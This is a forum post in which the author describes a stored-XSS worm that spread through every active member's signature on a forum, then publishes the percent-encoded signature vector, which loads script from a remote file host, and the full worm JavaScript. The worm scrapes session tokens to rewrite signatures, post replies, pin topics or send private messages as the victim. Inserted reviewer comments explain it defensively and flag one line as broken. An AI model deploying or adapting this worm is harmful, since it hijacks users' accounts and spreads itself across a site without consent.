Quote
I once wrote an XSS worm on a forum, based on a flaw in some JavaScript code (it called unescape on info from the user's signature). I had it add its own code as well as a bit of invisible text as a payload, and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the problem was, because the code was removed (and the worm failed to work after that). I could publish the code if it's of interest.
Here is the vector:
<!-- Reviewer annotation: this is the stored-XSS vector as it sits in a signature. It is an empty anchor whose href carries '@'-separated fields. The percent-encoded field decodes to an <img> element with an inline onload handler that calls a function named loadjs() on a remotely hosted text file. Per the author's description, it only becomes live markup because a page script calls unescape() on signature data and writes the result into the page. Defensive takeaways: never unescape user-controlled data into HTML, encode signature content on output, and treat percent-encoded "%3C...%3E" runs inside stored hrefs as an indicator worth searching for. -->
<a href='http://eapr-1/@0@%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%2E%74%78%74%27%29%22%20%2F%3E@-2@@1@0@-3@@' target='_blank'></a>
Here is the worm code itself:
// Reviewer annotation (defensive reading; the code below is unchanged).
// What this is: a script that runs in a logged-in forum member's browser after the signature vector fires.
// It uses XMLHttpRequest (with an ActiveX fallback) to drive the forum's own forms at `url`, so every
// request is sent within that member's session.
// The mode is chosen by `hack`; as published it is "sig":
//   "sig"        - GET the signature editor (act=UserCP&CODE=22), read the hidden `key` field and the
//                  current signature text out of the response with regexes, then POST the modified
//                  signature back (act=UserCP&CODE=23).
//   "post"/"pin" - GET the reply form, take the 32 characters after "auth_key' value='", then POST either
//                  a reply (act=Post&CODE=03) or an act=Mod request (CODE=15; the mode name suggests
//                  pinning the topic - not confirmed by this listing).
//   "PM"         - POST a private message (act=Msg&CODE=04) directly, with no token read first.
// Security point: the per-form tokens (`key`, `auth_key`) are scraped from same-origin responses, so
// anti-CSRF tokens give no protection once script executes inside the forum's origin. The fix belongs at
// the injection point: no unescape() of user-controlled signature data into markup, and encoding on output.
// Propagation guard: `post` doubles as an "already modified" marker (old.indexOf(post)<0 gates the write),
// and `vector` is appended only when the existing eapr-1 anchor does not already contain it.
// Indicators visible in this listing: stored signatures containing an empty <a href='http://eapr-1/...'>
// anchor with percent-encoded "%3C...%3E" data, or ending in the `post` marker string.
// Code notes: vector, auth, key, old, xpr, xpr1 and nxp (and `parameters` in the "sig" branch) are assigned
// without a declaration and therefore become globals. If neither XHR API is available, `req` stays null
// and the assignment to req.onreadystatechange throws.
var req = null; var stage = 0; var hack = "sig"; var url = "http://maple-world.net/"; var member = ""; var forum = ""; var topic = ""; var title = ""; var post = " ~~~~@"; vector="%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%32%2E%74%78%74%27%29%22%20%2F%3E"; if (window.XMLHttpRequest) { req = new XMLHttpRequest(); if (req.overrideMimeType) { req.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } req.onreadystatechange = function() { if(req.readyState == 4) { if(req.status == 200) { if(hack == "post" || hack == "pin") { stage += 1; if(stage==1) { var i = req.responseText.indexOf("auth_key' value='") + 17; auth = req.responseText.substring(i, i + 32); req.open("POST", url + "index.php?", true); if(hack=="post") { var parameters = "act=Post&s=&f="+forum+"&auth_key="+auth+"&CODE=03&enableemo=yes&t="+topic+"&Post="+post; } else if(hack == "pin") { var parameters = "act=Mod&f="+forum+"&auth_key="+auth+"&CODE=15&t="+topic; } req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } } else if(hack=="sig") { stage+=1; if(stage==1) { key=req.responseText.match(/<input type='hidden' name='key' value='([0-9a-f]+)' \/>/)[1]; old=req.responseText.match(/<textarea cols='60' rows='12' name='Post' tabindex='3' class='textinput'>([\s\S]+?)<\/textarea>/)[1]; xpr=old.match(/<a href='http:\/\/eapr-1\/(@[^@]*@[^@]*)(@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@)' target='_blank'><\/a>/); if(xpr){ 
// NOTE(review): the statement `nxp="+"]";` on the next line is not valid JavaScript as shown. Part of the
// string-building expression appears to have been lost when the post was rendered, so xpr1 and the second
// capture group xpr[2] have no visible use. Treat the listing as incomplete rather than as runnable code.
if(xpr[1].indexOf(vector)<0){xpr1=xpr[1]+vector;}else{xpr1=xpr[1];} nxp="+"]"; old=old.replace(/<a href='http:\/\/eapr-1\/[^']+' target='_blank'><\/a>/,nxp); } if(old.indexOf(post)<0){ parameters="act=UserCP&CODE=23&key="+key+"&Post="+encodeURIComponent(old+post); req.open("POST", url + "index.php?", true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } } } } } }; if(stage==0) { if(hack=="post" || hack=="pin") { req.open("GET", url + "index.php?act=Post&CODE=02&f="+forum+"&t="+topic, true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.send(null); } else if(hack=="PM") { req.open("POST", url + "index.php?", true); post = encodeURI(post); title = encodeURI(title); var parameters = "act=Msg&CODE=04&MODE=01&OID=&entered_name="+member+"&msg_title="+title+"&Post="+post; req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } else if(hack=="sig") { req.open("GET", url + "index.php?act=UserCP&CODE=22", true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.send(null); } }